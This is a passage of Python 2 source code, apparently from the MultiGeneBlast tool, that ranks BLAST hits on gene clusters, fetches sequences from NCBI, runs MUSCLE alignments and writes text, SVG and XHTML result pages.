sourcedict, multiplehitlist, universalquerydict = sort_genes_per_nucleotide(querylist, blastdict, nucdict)
clusterdict, geneposdict, hitclusters, clusters = find_geneclusters(sourcedict, universalquerydict, allowedgenedistance, nucdescriptions, proteininfo, dnaseqlength)
blastdict = update_blastdict(blastdict, querylist, clusterdict, multiplehitlist)
return blastdict, geneposdict, hitclusters, clusters, multiplehitlist
def score_blast(hitclusters, querylist, blastdict, clusters, multiplehitlist, arch_search, syntenyweight):
#Score BLAST output on all gene clusters
#Rank gene cluster hits based on 1) number of protein hits covering >25% sequence length or at least 100aa alignment, with >30% identity and 2) cumulative blast score
#Find number of protein hits and cumulative blast score for each gene cluster
log(" Scoring Blast outputs...")
hitclusterdict = {}
hitclusterdata = {}
for i in hitclusters:
frame_update()
hitclusterdatalist = []
nrhits = float(0)
cumblastscore = float(0)
hitpositions = []
hitposcorelist = []
for j in querylist:
querynrhits = 0
querycumblastscore = float(0)
nrhitsplus = "n"
if blastdict.has_key(j):
for k in blastdict[j][0]:
if k in multiplehitlist and i == blastdict[j][1][k][0]:
if [querylist.index(j),clusters[i][0].index(blastdict[j][1][k][11])] not in hitpositions:
nrhitsplus = "y"
querynrhits += 1
blastscore = float(blastdict[j][1][k][6]) / 1000000
querycumblastscore = querycumblastscore + blastscore
hitclusterdatalist.append([j,k,blastdict[j][1][k][5],blastdict[j][1][k][6],blastdict[j][1][k][7],blastdict[j][1][k][8]])
hitclusterdata[i] = hitclusterdatalist
hitpositions.append([querylist.index(j),clusters[i][0].index(blastdict[j][1][k][11])])
if nrhitsplus == "y":
nrhits += 1
for hit in range(querynrhits):
hitposcorelist.append(0)
cumblastscore = cumblastscore + float(querycumblastscore)
query_givenscores_querydict = {}
query_givenscores_hitdict = {}
#Find groups of hits
hitgroupsdict = {}
for p in hitpositions:
if not hitgroupsdict.has_key(p[0]):
hitgroupsdict[p[0]] = [p[1]]
else:
hitgroupsdict[p[0]].append(p[1])
        #Calculate synteny score; score only if there is more than one hit (otherwise no synteny is possible), and only once for every query gene and every hit gene
if arch_search == "n":
synteny_score = 0
z = 1
if nrhits > 1:
for p in hitpositions[:-1]:
tandem = "n"
#Check if a gene homologous to this gene has already been scored for synteny in the previous entry
if p[1] in hitgroupsdict[hitpositions[z][0]]:
tandem = "y"
#Score entry
if ((not query_givenscores_querydict.has_key(p[0])) or query_givenscores_querydict[p[0]] == 0) and ((not query_givenscores_hitdict.has_key(p[1])) or query_givenscores_hitdict[p[1]] == 0) and tandem == "n":
q = hitpositions[z]
if (abs(p[0] - q[0]) < 2) and abs(p[0]-q[0]) == abs(p[1]-q[1]):
synteny_score += 1
if hitposcorelist[z - 1] == 1 or hitposcorelist[z] == 1:
synteny_score += 1
query_givenscores_querydict[p[0]] = 1
query_givenscores_hitdict[p[1]] = 1
else:
query_givenscores_querydict[p[0]] = 0
query_givenscores_hitdict[p[1]] = 0
z += 1
#Weigh synteny score by factor
synteny_score = float(synteny_score) * syntenyweight
            #The sorting score is based on the number of hits and the synteny score (dominant terms) plus the cumulative Blast bit score scaled down to act as a tie-breaker
sortingscore = nrhits + synteny_score + cumblastscore
else:
sortingscore = nrhits + cumblastscore
hitclusterdict[i] = float(sortingscore)
#Sort gene clusters
rankedclusters = sortdictkeysbyvaluesrev(hitclusterdict)
rankedclustervalues = sortdictkeysbyvaluesrevv(hitclusterdict)
return rankedclusters, rankedclustervalues, hitclusterdata
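# Worked example of the sorting score (illustrative numbers): with 4 query genes hit, a
# raw synteny score of 2 weighted by syntenyweight 0.5, and a cumulative bit score of
# 5200 (each hit's score is divided by 1,000,000 before summing), the score is
# 4 + 1.0 + 0.0052 = 5.0052: hit count dominates, synteny breaks ties, and the scaled
# bit score only orders otherwise equal clusters.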
def write_txt_output(rankedclusters, rankedclustervalues, hitclusterdata, proteins, proteininfo, querytags, infile, clusters, nucdescriptions, pages):
global dbname
#Check if the number of set pages is not too large for the number of results
possible_pages = len(rankedclusters) / 50
if len(rankedclusters) % 50 > 1:
possible_pages += 1
if possible_pages < int(pages):
pages = possible_pages
if pages == 0:
pages = 1
#Output for each hit: table of genes and locations of input cluster, table of genes and locations of hit cluster, table of hits between the clusters
log(" Writing TXT output file...")
out_file = open(dbname + "clusterblast_output.txt","w")
out_file.write("ClusterBlast scores for " + infile)
out_file.write("\n")
out_file.write("\n")
out_file.write("Table of genes, locations, strands and annotations of query cluster:")
out_file.write("\n")
maxpos = 0
minpos = 1000000000000
for i in querytags:
out_file.write(i)
out_file.write("\t")
out_file.write(proteins[3][i][0])
out_file.write("\t")
out_file.write(proteins[3][i][1])
out_file.write("\t")
out_file.write(proteins[3][i][2])
out_file.write("\t")
out_file.write(proteins[3][i][3])
out_file.write("\t")
out_file.write(proteins[3][i][-1])
out_file.write("\t")
out_file.write("\n")
if int(proteins[3][i][0]) > maxpos:
maxpos = int(proteins[3][i][0])
if int(proteins[3][i][1]) > maxpos:
maxpos = int(proteins[3][i][1])
if int(proteins[3][i][0]) < minpos:
minpos = int(proteins[3][i][0])
if int(proteins[3][i][1]) < minpos:
minpos = int(proteins[3][i][1])
frame_update()
#Add extra genes from query file that are in between selected genes
for i in proteins[0]:
if int(i.split("|")[2].partition("-")[0]) > minpos and int(i.split("|")[2].partition("-")[2]) > minpos and int(i.split("|")[2].partition("-")[0]) < maxpos and int(i.split("|")[2].partition("-")[2]) < maxpos:
if i.split("|")[4] in querytags or i.split("|")[-1] in querytags:
continue
try:
out_file.write(i.split("|")[4])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][0])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][1])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][2])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][3])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[4]][-1])
out_file.write("\t")
except:
out_file.write(i.split("|")[-1])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][0])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][1])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][2])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][3])
out_file.write("\t")
out_file.write(proteins[3][i.split("|")[-1]][-1])
out_file.write("\t")
out_file.write("\n")
out_file.write("\n")
out_file.write("\n")
out_file.write("Significant hits: ")
out_file.write("\n")
z = 0
for i in rankedclusters[:(pages * 50)]:
out_file.write(str(z+1) + ". " + i + "\t" + clusters[i][1])
out_file.write("\n")
z += 1
out_file.write("\n")
out_file.write("\n")
z = 0
out_file.write("Details:")
for i in rankedclusters[:(pages * 50)]:
frame_update()
value = str(rankedclustervalues[z])
nrhits = value.split(".")[0]
        if int(nrhits) > 0:
out_file.write("\n\n")
out_file.write(">>")
out_file.write("\n")
            mgbscore = str(float(value.split(".")[0] + "." + value.split(".")[1][0]))
cumblastscore = str(int(float("0." + value.split(".")[1][1:]) * 100000))
out_file.write("\n")
out_file.write(str(z+1) + ". " + i)
out_file.write("\n")
nucleotidename = ""
for j in i.split("_")[:-1]:
nucleotidename = nucleotidename + j + "_"
nucleotidename = nucleotidename[:-1].split(".")[0]
nucdescription = ""
for j in nucdescriptions.keys():
if j in nucleotidename:
nucdescription = nucdescriptions[j]
break
out_file.write("Source: " + nucdescription)
out_file.write("\n")
out_file.write("Number of proteins with BLAST hits to this cluster: " + nrhits)
out_file.write("\n")
out_file.write("MultiGeneBlast score: " + mgbscore)
out_file.write("\n")
out_file.write("Cumulative Blast bit score: " + cumblastscore)
out_file.write("\n")
out_file.write("\n")
out_file.write("Table of genes, locations, strands and annotations of subject cluster:")
out_file.write("\n")
clusterproteins = clusters[i][0]
for j in clusterproteins:
#if proteinlocations.has_key(j) and proteinannotations.has_key(j) and proteinstrands.has_key(j):
out_file.write(j)
out_file.write("\t")
out_file.write(str(proteininfo[j].pstart))
out_file.write("\t")
out_file.write(str(proteininfo[j].pend))
out_file.write("\t")
if proteininfo[j].strand == 1:
out_file.write("+")
else:
out_file.write("-")
out_file.write("\t")
out_file.write(str(proteininfo[j].annotation))
out_file.write("\t")
out_file.write(str(proteininfo[j].locustag.replace("\n","")))
out_file.write("\n")
out_file.write("\n")
out_file.write("Table of Blast hits (query gene, subject gene, %identity, blast score, %coverage, e-value):")
out_file.write("\n")
if i in hitclusterdata.keys():
tabledata = hitclusterdata[i]
for x in tabledata:
w = 0
for y in x:
if w == 0:
out_file.write(str(y).split("|")[4])
out_file.write("\t")
w += 1
else:
out_file.write(str(y))
out_file.write("\t")
out_file.write("\n")
else:
"data not found"
out_file.write("\n")
out_file.write("\n")
z += 1
out_file.close()
return pages
def score_blast_output(hitclusters, querylist, blastdict, multiplehitlist, proteins, proteininfo, querytags, infile, clusters, nucdescriptions, pages, arch_search, syntenyweight):
rankedclusters, rankedclustervalues, hitclusterdata = score_blast(hitclusters, querylist, blastdict, clusters, multiplehitlist, arch_search, syntenyweight)
pages = write_txt_output(rankedclusters, rankedclustervalues, hitclusterdata, proteins, proteininfo, querytags, infile, clusters, nucdescriptions, pages)
return pages
def read_multigeneblast_data(page):
queryclusterdata = {}
nrhitgeneclusters = {}
clusterblastfile = open(dbname + "clusterblast_output.txt","r")
clusterblastfile = clusterblastfile.read()
clusterblastfile = clusterblastfile.replace("\r","\n")
tophitclusters = []
#Identify top 50 hits for visualization
hitlines = [i for i in ((clusterblastfile.split("Significant hits: \n")[1]).split("\nDetails:")[0]).split("\n") if i != ""]
a = 0
cb_accessiondict = {}
b = 1
for i in hitlines:
if " " in i:
cb_accessiondict[b] = (i.split("\t")[0]).split(" ")[1]
b += 1
if a < page * 50 and a >= (page - 1) * 50:
if len(i) < 140:
tophitclusters.append(i)
elif len(i) >= 140:
j = i[0:137] + "..."
tophitclusters.append(j)
a += 1
details = (clusterblastfile.split("\nDetails:")[1]).split(">>")[1:]
nrhitclusters = len(tophitclusters)
frame_update()
#Save query gene cluster data
querylines = ((clusterblastfile.split("Table of genes, locations, strands and annotations of query cluster:\n")[1]).split("\n\n\nSignificant hits:")[0]).split("\n")
queryclustergenes = []
queryclustergenesdetails = {}
for i in querylines:
tabs = i.split("\t")
queryclustergenes.append(tabs[0])
queryclustergenesdetails[tabs[0]] = [tabs[1],tabs[2],tabs[3],tabs[4], tabs[5]]
#Sort query cluster genes by start position
starts = [max([int(queryclustergenesdetails[gene][0]), int(queryclustergenesdetails[gene][1])]) for gene in queryclustergenes]
genesAndStarts = zip(starts, queryclustergenes)
genesAndStarts.sort()
starts, queryclustergenes = zip(*genesAndStarts)
return queryclusterdata, nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, tophitclusters, details
def process_multigeneblast_data(nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, internalhomologygroupsdict, tophitclusters, details, page):
#For every gene cluster, store hit genes and details
colorgroupsdict = {}
hitclusterdata = {}
blastdetails = {}
mgb_scores = {}
hitclusternr = 1
for i in details:
frame_update()
hitclustergenes = []
hitclustergenesdetails = {}
#Only calculate for specified hit gene clusters
if not (hitclusternr <= page * 50 and hitclusternr >= (page - 1) * 50):
hitclusternr += 1
else:
nrhitgeneclusters[1] = hitclusternr
accession = cb_accessiondict[hitclusternr]
#Store mgb score
mgbscore = i.partition("MultiGeneBlast score: ")[2].partition("\n")[0]
cumblastscore = i.partition("Cumulative Blast bit score: ")[2].partition("\n")[0]
mgb_scores[accession] = [mgbscore, cumblastscore]
#Store Blast details
blastdetailslines = [line for line in (i.split("%coverage, e-value):\n")[1]).split("\n") if line != ""]
for line in blastdetailslines:
tabs = line.split("\t")
if not blastdetails.has_key(accession):
blastdetails[accession] = {}
if not blastdetails[accession].has_key(tabs[1]):
blastdetails[accession][tabs[1]] = [[tabs[0], tabs[2], tabs[3], tabs[4], tabs[5]]]
else:
blastdetails[accession][tabs[1]].append([tabs[0], tabs[2], tabs[3], tabs[4], tabs[5]])
#Store Basic Blast output data
hitclustergeneslines = [line for line in ((i.split("Table of genes, locations, strands and annotations of subject cluster:\n")[1]).split("\n\nTable of Blast hits ")[0]).split("\n") if line != ""]
locations = []
for j in hitclustergeneslines:
tabs = j.split("\t")
hitclustergenes.append(tabs[0])
hitclustergenesdetails[tabs[0]] = [tabs[1],tabs[2],tabs[3],tabs[4], tabs[5]]
locations = locations + [int(tabs[1]),int(tabs[2])]
#cstart = min(locations)
#cend = max(locations)
#print [proteininfo[j][0] for j in proteininfo.keys()]
#z = 0
#for j in proteininfo.keys():
# if accession.rpartition("_")[0] == proteininfo[j][0]:
# z += 1
# if z == 200:
# z = 0
# if int(proteininfo[j][1]) > cstart and int(proteininfo[j][2]) < cend:
# #proteininfo[j] = [genome,location.partition("-")[0],location.partition("-")[2],strand,annotation]
# if j not in hitclustergenes:
# hitclustergenes.append(j)
# hitclustergenesdetails[j] = proteininfo[j][1:]
blasthitslines = [line for line in ((i.split("%coverage, e-value):\n")[1]).split("\n\n")[0]).split("\n") if line != ""]
if len(blasthitslines) > 0:
blasthitdict = {}
blastdetailsdict = {}
querygenes = []
revblasthitdict = {}
hitgenes = []
for i in blasthitslines:
tabs = i.split("\t")
if blasthitdict.has_key(tabs[0]):
hits = blasthitdict[tabs[0]]
hits.append(tabs[1])
blasthitdict[tabs[0]] = hits
if revblasthitdict.has_key(tabs[1]):
revhits = revblasthitdict[tabs[1]]
revhits.append(tabs[0])
revblasthitdict[tabs[1]] = revhits
else:
revblasthitdict[tabs[1]] = [tabs[0]]
blastdetailsdict[tabs[0] + "_|_|_" + tabs[1]] = [tabs[4],tabs[3]]
if tabs[0] not in querygenes:
querygenes.append(tabs[0])
hitgenes.append(tabs[1])
else:
blasthitdict[tabs[0]] = [tabs[1]]
if revblasthitdict.has_key(tabs[1]):
revhits = revblasthitdict[tabs[1]]
revhits.append(tabs[0])
revblasthitdict[tabs[1]] = revhits
else:
revblasthitdict[tabs[1]] = [tabs[0]]
blastdetailsdict[tabs[0] + "_|_|_" + tabs[1]] = [tabs[4],tabs[3]]
if tabs[0] not in querygenes:
querygenes.append(tabs[0])
hitgenes.append(tabs[1])
#Make groups of genes for coloring
colorgroups = []
internalgroups = internalhomologygroupsdict[1]
for i in internalgroups:
querygenes_and_hits = []
for j in i:
#Make list of query gene and its hits
additionalhits = []
                        #For each hit of this query gene, check whether another query gene also hit it; if so, only add it to the group if this query gene had the highest blast score for it
queryscore = 0
if blasthitdict.has_key(j):
for k in blasthitdict[j]:
otherscores = []
for l in blastdetailsdict.keys():
if j == l.partition("_|_")[0] and k == l.rpartition("_|_")[2]:
queryscore = blastdetailsdict[l][1]
if k in l and j not in l:
otherscores.append(blastdetailsdict[l][1])
allscores = otherscores + [queryscore]
if int(queryscore) == max([int(m) for m in allscores]):
additionalhits.append(k)
#Add additional hits to the querygenes_and_hits list that will form a colorgroup
querygenes_and_hits = querygenes_and_hits + additionalhits
if j not in querygenes_and_hits:
querygenes_and_hits.append(j)
if len(querygenes_and_hits) > 0:
colorgroups.append(querygenes_and_hits)
colorgroupsdict[hitclusternr] = colorgroups
hitclusterdata[hitclusternr] = [colorgroupsdict,hitclustergenes,hitclustergenesdetails,queryclustergenes,queryclustergenesdetails,tophitclusters,accession]
hitclusternr += 1
else:
nrhitclusters = nrhitclusters - 1
if len(details) == 0:
log("MultiGeneBlast found no significant hits. Exiting...", exit=True)
return hitclusterdata, nrhitclusters, blastdetails, mgb_scores
def write_svg_files(queryclusterdata, hitclusterdata, nrhitclusters, internalhomologygroupsdict, svgfolder, page, screenwidth, arch_search):
queryclusterdata[1] = [nrhitclusters,hitclusterdata]
clusterblastpositiondata = {}
i = page
#Create alignment svg for each pair of hit&query
hitclusters = [nr + (page - 1) * 50 for nr in range(queryclusterdata[1][0] + 1)[1:]]
#Create svgs for pairwise gene cluster alignment
colorschemedict,rgbcolorscheme = calculate_colorgroups(1,hitclusters,queryclusterdata,internalhomologygroupsdict)
for k in hitclusters:
frame_update()
cresults = clusterblastresults(page,[k],queryclusterdata,colorschemedict,rgbcolorscheme, screenwidth, arch_search)
s = cresults[0]
clusterblastpositiondata[str(i) + "_"+str(k)] = cresults[1]
outfile = open(svgfolder + "clusterblast" + str(i) + "_" + str(k) + ".svg","w")
outfile.write(s.getXML())
outfile.close()
#Create svgs for multiple gene cluster alignment
cresults = clusterblastresults(page,hitclusters,queryclusterdata,colorschemedict,rgbcolorscheme, screenwidth, arch_search, allhits="y")
s = cresults[0]
clusterblastpositiondata[str(i) + "_all"] = cresults[1]
outfile = open(svgfolder + "clusterblast" + str(i) + "_all.svg","w")
outfile.write(s.getXML())
outfile.close()
return clusterblastpositiondata, colorschemedict
def write_svgs(page, screenwidth, internalhomologygroupsdict, arch_search):
log("Writing visualization SVGs and XHTML")
svgfolder = "svg/"
try:
os.mkdir(svgfolder)
except(IOError,OSError):
pass
#Read in MultiGeneBlast output data
queryclusterdata, nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, tophitclusters, details = read_multigeneblast_data(page)
hitclusterdata, nrhitclusters, blastdetails, mgb_scores = process_multigeneblast_data(nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, internalhomologygroupsdict, tophitclusters, details, page)
clusterblastpositiondata, colorschemedict = write_svg_files(queryclusterdata, hitclusterdata, nrhitclusters, internalhomologygroupsdict, svgfolder, page, screenwidth, arch_search)
return queryclusterdata, colorschemedict, clusterblastpositiondata, blastdetails, mgb_scores
def runmuscle(args):
os.system("muscle " + args)
def align_muscle(include_muscle, colorschemedict, seqdict):
#Create Muscle alignments of colourgroups
musclegroups = []
if include_muscle == "y":
log("Aligning homologous sequences with Muscle")
try:
os.mkdir("fasta")
except(IOError,OSError):
pass
orthogroupsdup = colorschemedict.values()
orthogroups = dict.fromkeys(orthogroupsdup).keys()
for k in orthogroups:
frame_update()
accessions = []
for l in colorschemedict.keys():
if colorschemedict[l] == k:
accessions.append(l)
seqdict2 = {}
for key in seqdict.keys():
seqdict2[key.split("|")[-1]] = seqdict[key]
queryseqs = [">" + acc + "\n" + seqdict2[acc] + "\n" for acc in accessions if seqdict2.has_key(acc)]
accessions = [acc for acc in accessions if testaccession(acc) == "y"]
if len(queryseqs) + len(accessions) < 2:
continue
musclegroups.append(k)
url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=protein&tool="multigeneblast"&ID=' + ",".join(accessions) + "&rettype=fasta&retmode=text"
urltry = "n"
tries = 0
while urltry == "n":
try:
time.sleep(3)
req = urllib2.Request(url)
response = urllib2.urlopen(req)
output = response.read()
if len(output) > 5:
urltry = "y"
if ">" not in output:
log("Downloading of FASTA sequences failed")
break
except (IOError,httplib.BadStatusLine,URLError,httplib.HTTPException):
tries += 1
if tries == 5:
break
log("Waiting for connection... (4)")
time.sleep(60)
outfile = open("fasta" + os.sep + "orthogroup" + str(k) + ".fasta","w")
for seq in queryseqs:
outfile.write(seq)
outfile.write(output)
outfile.close()
args = "-quiet -in fasta" + os.sep + "orthogroup" + str(k) + ".fasta -out fasta" + os.sep + "orthogroup" + str(k) + "_muscle.fasta"
muscleprocess = Process(target=runmuscle, args=[args])
muscleprocess.start()
while True:
processrunning = "n"
if muscleprocess.is_alive():
processrunning = "y"
if processrunning == "y":
frame_update()
else:
break
return musclegroups
def create_xhtml_template(queryclusterdata, page, pages):
#Create HTML file with gene cluster info in hidden div tags
htmlfile = open(MGBPATH + os.sep + "empty.xhtml","r")
html = htmlfile.read()
html = html.replace("\r","\n")
htmlparts = html.split("<SPLIT HERE>")
htmloutfile = open(dbname + "displaypage" + str(page) + ".xhtml","w")
htmloutfile.write(htmlparts[0] + ' displaycblastresults("' + str(page) + '","all")' + htmlparts[1])
htmloutfile.write("var list=[" + ",".join([str(nr + (page - 1) * 50 + 1) for nr in range(queryclusterdata[1][0])]) + ",'all'];" + htmlparts[2])
htmloutfile.write("var list=[" + ",".join([str(nr + (page - 1) * 50 + 1) for nr in range(queryclusterdata[1][0])]) + ",'all'];" + htmlparts[3])
htmloutfile.write('<a class="bigtext"><br/><br/> Results pages: ')
for pagenr in [pagenr + 1 for pagenr in range(pages)]:
htmloutfile.write('<a href="displaypage' + str(pagenr) + '.xhtml" class="bigtext">' + str(pagenr) + '</a>')
if pagenr != pages:
htmloutfile.write(", ")
else:
htmloutfile.write("</a>")
htmloutfile.write(htmlparts[4])
return htmloutfile, htmlparts
def write_xhtml_output(htmloutfile, queryclusterdata, clusters, clusterblastpositiondata, nucname, page, screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, dbtype):
#Write ClusterBlast divs with pictures and description pop-up tags
frame_update()
htmloutfile.write('<div id="clusterblastview" class="clusterdescr">\n\n')
#Add menu bar 3
htmloutfile.write('<div id="bartext3" style="color:#FFFFFF; font-size:1em; position:absolute; z-index:2; top:3px; left:20px;"><b>MultiGeneBlast hits</b></div>')
htmloutfile.write('<div id="descrbar3" style="position:absolute; z-index:1; top:0px;"><img src="images/bar.png" height="25" width="' + str(int(0.75*screenwidth)) + '"/></div>')
htmloutfile.write('<div class="help" id="help3" style="position:absolute; z-index:1; top:2px; left:' + str(int(screenwidth * 0.75) - 30) + 'px;"><a href="http://multigeneblast.sourceforge.net/usage.html" target="_blank"><img border="0" src="images/help.png"/></a></div>')
qclusternr = page
nrhitclusters = queryclusterdata[1][0]
hitclusterdata = queryclusterdata[1][1]
htmloutfile.write('<div id="qcluster' + str(qclusternr) + '">\n<br/><br/>\n<div align="left">\n<form name="clusterform' + str(qclusternr) + '">\n<select name="selection' + str(qclusternr) + '" onchange="javascript:navigate(this);">\n')
htmloutfile.write('<option value="">Select gene cluster alignment</option>\n')
for i in range(nrhitclusters):
cdescription = hitclusterdata[i + 1 + (page - 1) * 50][5][i].replace("&","&amp;")
if len(cdescription) > 80:
cdescription = cdescription[:77] + "..."
htmloutfile.write('<option value="javascript:displaycblastresults(' + str(page) + ',' + str(i+1 + (page - 1) * 50) + ')">' + cdescription + '</option>\n')
htmloutfile.write('</select>\n</form>\n\n</div>')
htmloutfile.write('<div style="position:absolute; top:33px; left:' + str(screenwidth*0.625) + 'px;"><img src="images/button.gif" name="button' + str(qclusternr) + '" onclick="javascript:displaybutton(' + str(qclusternr) + ');"/></div>')
for i in range(nrhitclusters):
frame_update()
hitclusterdata = queryclusterdata[1][1]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
queryclustergenesdetails = hitclusterdata[hitclusterdata.keys()[0]][4]
hitclusternumber = i + 1 + (page - 1) * 50
cluster_acc = hitclusterdata[hitclusternumber][6]
cluster_blastdetails = blastdetails[cluster_acc]
mgbscore = mgb_scores[cluster_acc][0]
cumblastscore = mgb_scores[cluster_acc][1]
hitclustergenes = clusters[cluster_acc][0]
hitclustergenesdetails = hitclusterdata[hitclusternumber][2]
relpositiondata = clusterblastpositiondata[str(page) + "_" + str(i + 1 + (page - 1) * 50)]
qrel_starts = relpositiondata[0][0]
qrel_ends = relpositiondata[0][1]
hrel_starts = relpositiondata[1][hitclusternumber][0]
hrel_ends = relpositiondata[1][hitclusternumber][1]
strandsbalance = relpositiondata[2][hitclusternumber]
hstarts = relpositiondata[3][hitclusternumber][0]
hends = relpositiondata[3][hitclusternumber][1]
invertedhstarts = [str(100000000 - int(l)) for l in hstarts]
invertedhends = [str(100000000 - int(l)) for l in hends]
if strandsbalance < 0:
hitclustergenes.reverse()
htmloutfile.write('<div id="hitcluster' + str(qclusternr) + '_' + str(i + 1 + (page - 1) * 50) + '">\n')
#Load svg and embed it into XHTML
svglines = open("svg" + os.sep + "clusterblast" + str(qclusternr) + '_' + str(i + 1 + (page - 1) * 50) + ".svg","r").read().split("\n")
htmloutfile.write("\n" + svglines[0][:-1] + 'id="svg' + str(qclusternr) + '_' + str(i + 1 + (page - 1) * 50) + '" >' + "\n")
for svgline in svglines[1:]:
htmloutfile.write(svgline + "\n")
#Insert gene cluster descriptions
cgbkdescription = hitclusterdata[i + 1 + (page - 1) * 50][5][i].replace("&","&amp;").replace("\t"," ").partition(" ")[2].partition(" ")[2].split(", whole")[0].split(", complete")[0].split(", partial")[0]
if len(cgbkdescription) > 90:
cgbkdescription = cgbkdescription[:87] + "..."
if testaccession(cluster_acc.rpartition("_")[0]) == "y":
cdescription = '<a href="http://www.ncbi.nlm.nih.gov/nuccore/' + cluster_acc.rpartition("_")[0] + '" target="_blank"> ' + cluster_acc.rpartition("_")[0] + "</a>" + " : " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
else:
cdescription = cluster_acc.rpartition("_")[0] + " : " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
if len(nucname) < 90:
qdescription = "Query: " + nucname
else:
qdescription = "Query: " + nucname[0:87] + "..."
htmloutfile.write('<div id="descriptionquery" style="text-align:left; position:absolute; top:60px; left:10px; font-size:10px; font-style:italic">' + qdescription + '</div>\n')
htmloutfile.write('<div id="description' + str(qclusternr) + '" style="text-align:left; position:absolute; top:115px; left:10px; font-size:10px; font-style:italic">' + cdescription + '</div>\n')
#Insert NCBI links
htmloutfile.write('<div id="pub_pics" style="position:absolute; top:175px; left:' + str(int(screenwidth * 0.0)) + 'px; font-size:10px"> Hit cluster cross-links: \n')
htmloutfile.write(' <a href="http://www.ncbi.nlm.nih.gov/nuccore/' + cluster_acc.rpartition("_")[0] + '" target="_blank"><img align="absmiddle" border="0" src="images/genbank.gif"/></a>\n')
htmloutfile.write('</div>\n\n')
#Create gene pop-ups
a = 0
for j in queryclustergenes:
j_accession = j
htmloutfile.write('<div id="q' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(100) + 'px; left:' + str(int(float(qrel_starts[a])*0.875)) + 'px;">\n')
htmloutfile.write(queryclustergenesdetails[j][3].replace("_"," ").replace("&","&amp;") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j_accession + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if j != queryclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(queryclustergenesdetails[j][0]) + "-" + str(queryclustergenesdetails[j][1]) + "\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="q' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(75) + 'px; left:' + str(int(float((float(qrel_starts[a])+float(qrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if queryclustergenesdetails[j][4] != "" and queryclustergenesdetails[j][4] != "no_locus_tag":
htmloutfile.write(queryclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a+= 1
a = 0
for j in hitclustergenes:
if ((hitclustergenesdetails[j][0] in hstarts or hitclustergenesdetails[j][0] in hends) and (hitclustergenesdetails[j][1] in hends or hitclustergenesdetails[j][1] in hstarts)) or ((hitclustergenesdetails[j][1] in invertedhstarts or hitclustergenesdetails[j][1] in invertedhends) and (hitclustergenesdetails[j][0] in invertedhends or hitclustergenesdetails[j][0] in invertedhstarts)):
j_accession = j
htmloutfile.write('<div id="h' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(151) + 'px; left:' + str(int(float(hrel_starts[a])*0.875)) + 'px;">\n')
htmloutfile.write(hitclustergenesdetails[j][3].replace("_"," ").replace("&","&amp;") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j_accession + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if dbtype == "nucl":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/nuccore/' + j.rpartition("_")[0] + '" target="_blank">' + j.rpartition("_")[0] + "</a>\n")
elif j != hitclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(hitclustergenesdetails[j][0]) + "-" + str(hitclustergenesdetails[j][1]) + "\n")
if cluster_blastdetails.has_key(j):
for blasthit in cluster_blastdetails[j]:
htmloutfile.write("<br/><br/><b>BlastP hit with " + blasthit[0] + "</b>\n<br/>Percentage identity: " + blasthit[1] + " %\n")
htmloutfile.write("<br/>BlastP bit score: " + blasthit[2] + "\n<br/>Sequence coverage: " + blasthit[3].partition(".")[0] + " %\n")
htmloutfile.write("<br/>E-value: " + blasthit[4] + "\n<br/>")
if testaccession(j) == "y" and dbtype != "nucl":
htmloutfile.write("<br/><a href=\"" + link + "\" target=\"_blank\"> NCBI BlastP on this gene </a>\n")
if colorschemedict.has_key(j) and colorschemedict[j] in musclegroups:
htmloutfile.write("<br/><a href=\"fasta" + os.sep + "orthogroup" + str(colorschemedict[j]) + "_muscle.fasta\" target=\"_blank\"> Muscle alignment of this gene with homologs </a>\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="h' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(126) + 'px; left:' + str(int(float((float(hrel_starts[a])+float(hrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if hitclustergenesdetails[j][4] != "" and hitclustergenesdetails[j][4] != "no_locus_tag":
